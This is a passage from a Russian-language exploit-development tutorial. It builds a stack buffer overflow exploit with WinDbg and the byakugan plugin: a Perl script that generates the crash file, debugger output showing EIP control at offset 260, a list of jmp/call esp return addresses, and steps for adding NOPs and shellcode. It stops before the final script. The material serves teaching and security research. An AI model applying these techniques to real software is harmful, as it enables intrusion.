Мы увидели, что можно построить эксплойт прямо на RET, переписав его (на отметке 260). Давайте напишем скрипт, который продемонстрирует как использование findReturn, поможет нам написать работающий эксплойт:
Для начала, напишем скрипт с нагрузкой из 264 характеристик metasploit pattern, следующих с 1000 A’s:
my $sploitfile="blazesploit.plf";my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8... Ai7";my $junk2 = "A" x 1000;$payload =$junk.$junk2; open ($FILE,">$sploitfile");aprint $FILE $payload;close($FILE); open ($FILE2,">c:\\junk2.txt");print $FILE2 $junk2;close($FILE2);
При открытии sploitfile, windbg пишет следующее:
(c34.7f4): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569ceip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206<Unloaded_ionInfo.dll>+0x37694135:37694136?????
Найдем требуемую информацию для написания эксплойта с помощью арсенала byakugan:
- отследите metasploit pattern ($junk)
- отследите A’s ($junk2)
- посмотрите, где переписывается eip (изменяется)
- посмотрите. где находятся $junk и $junk2
- найдите обратные адреса
0:000>!load byakugan[Byakugan] Successfully loaded! 0:000>!jutsu identBuf msfpattern myJunk1 264[J] Creating buffer myJunk1. 0:000>!jutsu identBuf file myJunk2 c:\junk2.txt[J] Creating buffer myJunk2. 0:000>!jutsu listBuf[J] Currently tracked buffer patterns: Buf: myJunk1 Pattern: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A... (etc) Buf: myJunk2 Pattern: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (etc) 0:000>!jutsu hunt[J] Controlling eip with myJunk1 at offset 260.[J] Found buffer myJunk1 @ 0x0012f254[J] Found buffer myJunk2 @ 0x0012f460[J] Found buffer myJunk2 @ 0x0012f460 - Victim of toUpper! 0:000>!jutsu findReturn[J] started return address hunt[J] valid return address (jmp esp) found at 0x3d9572cc[J] valid return address (call esp) found at 0x3d9bb043[J] valid return address (jmp esp) found at 0x3d9bd376[J] valid return address (call esp) found at 0x4b2972cb[J] valid return address (jmp esp) found at 0x4b297591[J] valid return address (call esp) found at 0x4b297ccb[J] valid return address (jmp esp) found at 0x4b297f91[J] valid return address (call esp) found at 0x4ec5c26d[J] valid return address (jmp esp) found at 0x4ec88543[J] valid return address (call esp) found at 0x4ece5a73[J] valid return address (jmp esp) found at 0x4ece7267[J] valid return address (call esp) found at 0x4ece728f[J] valid return address (jmp esp) found at 0x4f1c5055[J] valid return address (call esp) found at 0x4f1c50eb[J] valid return address (jmp esp) found at 0x4f1c53b1[J] valid return address (call esp) found at 0x4f1c5aeb[J] valid return address (jmp esp) found at 0x4f1c5db1[J] valid return address (jmp esp) found at 0x74751873[J] valid return address (call esp) found at 0x7475d20f[J] valid return address (jmp esp) found at 0x748493ab[J] valid return address (call esp) found at 0x748820df[J] valid return address (jmp esp) found at 0x748d5223[J] valid return address (call esp) found at 0x755042a9[J] valid return address (jmp esp) found at 0x75fb5700[J] valid return address (jmp esp) found at 0x76b43adc[J] valid return address (call esp) found at 0x77132372[J] valid return address (jmp esp) found at 0x77156342[J] valid return address (call esp) found at 0x77506cca[J] valid return address (jmp esp) found at 0x77559bff[J] valid return address (call esp) found at 0x7756e37b[J] valid return address (jmp esp) found at 0x775a996b[J] valid return address (jmp esp) found at 0x77963da3[J] valid return address (call esp) found at 0x7798a67b[J] valid return address (call esp) found at 0x77b4b543[J] valid return address (jmp esp) found at 0x77def069[J] valid return address (call esp) found at 0x77def0d2[J] valid return address (jmp esp) found at 0x77e1b52b[J] valid return address (call esp) found at 0x77eb9d02[J] valid return address (jmp esp) found at 0x77f31d8a[J] valid return address (call esp) found at 0x77f396f7[J] valid return address (jmp esp) found at 0x77fab227etc...
Результаты:
- eip был перезаписан в ячейке 260 из myJunk1.
- myJunk2 (A’s) был найден в 0x0012f460 (which is esp-10). Т.е. если мы переместим eip с jmp esp, то начало нашего shellcode будет в myJunk2 + 10 байт (или 16 символов(characters))
- необходимо удалить последние 4 байта из $junk нашего скрипта, и добавить адрес (4 байта) jmp esp или call esp, который перезапишет RET. (Конечно, вам все еще нужно проверять адрес …). Мы используем 0x035fb847 в качестве примера (не показанный в программах выше; я все еще предпочитаю вручную выбирать использование обратных адресов, используя memdump или findjmp –просто потому что вы не можете увидеть модуль принадлежащий ‘findReturn’…
- нам необходимо
- переместить 1000 A’s с shellcode
- добавить в список 16 NOP’s перед shellcode (я добавил 50 nops … Если вы добавили меньше, то ваш shellcode упадет, что я проверил, используя memDiff)
Скрипт:
